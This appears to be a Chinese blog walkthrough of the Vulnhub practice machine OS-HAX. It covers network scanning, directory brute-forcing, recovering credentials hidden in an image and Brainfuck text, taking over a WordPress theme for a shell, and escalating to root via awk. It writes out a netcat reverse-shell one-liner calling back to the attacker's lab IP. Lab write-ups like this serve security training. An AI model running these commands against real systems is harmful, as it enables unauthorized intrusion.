【Vulnhub】靶机Os-Hax

admin 2022年1月10日03:33:44安全博客评论13 views964字阅读3分12秒阅读模式

前言

  • Vulnhub刷题简单记录

OS-HAX

描述

难度:中级

标志:引导根

学习:利用 | 网络应用安全| 权限提升

https://www.vulnhub.com/entry/hacknos-os-hax,389/

OS-HAX开始

1、可以用两种方法确认靶场的存在,扫ip

1
2
netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

1
nmap -sV -sC -A 192.168.1.108

3、访问主页,根据提示说有一个password_resets,我们扫一下目录情况

1
2
3
gobuster dir -u http://192.168.1.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200

dirb http://192.168.1.104/

4、通过String查看img中的flaghost的图片,获取一个密码的信息[email protected]

5、也可以用exiftool 来查看图片信息

6、接着猜测他是目录,发现了brainfuck加密,接着去解密http://192.168.1.102/[email protected]/flag2.txt

1
2
3
4
i+++++ +++++ [->++ +++++ +++<] >++++ +++++ +++++ +++++ .<+++ +[->- ---<]
>--.- --.<+ +++++ [->-- ----< ]>--- -.<++ +[->+ ++<]> +++++ .<+++ ++[->
+++++ <]>.+ +.+++ +++++ .---- --.<+ ++[-> +++<] >++++ .<+++ ++++[ ->---
----< ]>-.< +++[- >---< ]>--- .+.-- --.++ +.<

image-20210923101446982

7、利用获取的账号和密码登陆wordpress后台改模板拿shell

image-20210923101819727

image-20210923102028521

7、用下面命令反弹shell

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&amp;1|nc 192.168.1.104 1234 >/tmp/f

image-20210923105501616

8、提权看下面截图,就是利用web的权限,执行awk命令来获取root权限

image-20210923110221578

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:33:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【Vulnhub】靶机Os-Hax http://cn-sec.com/archives/730027.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: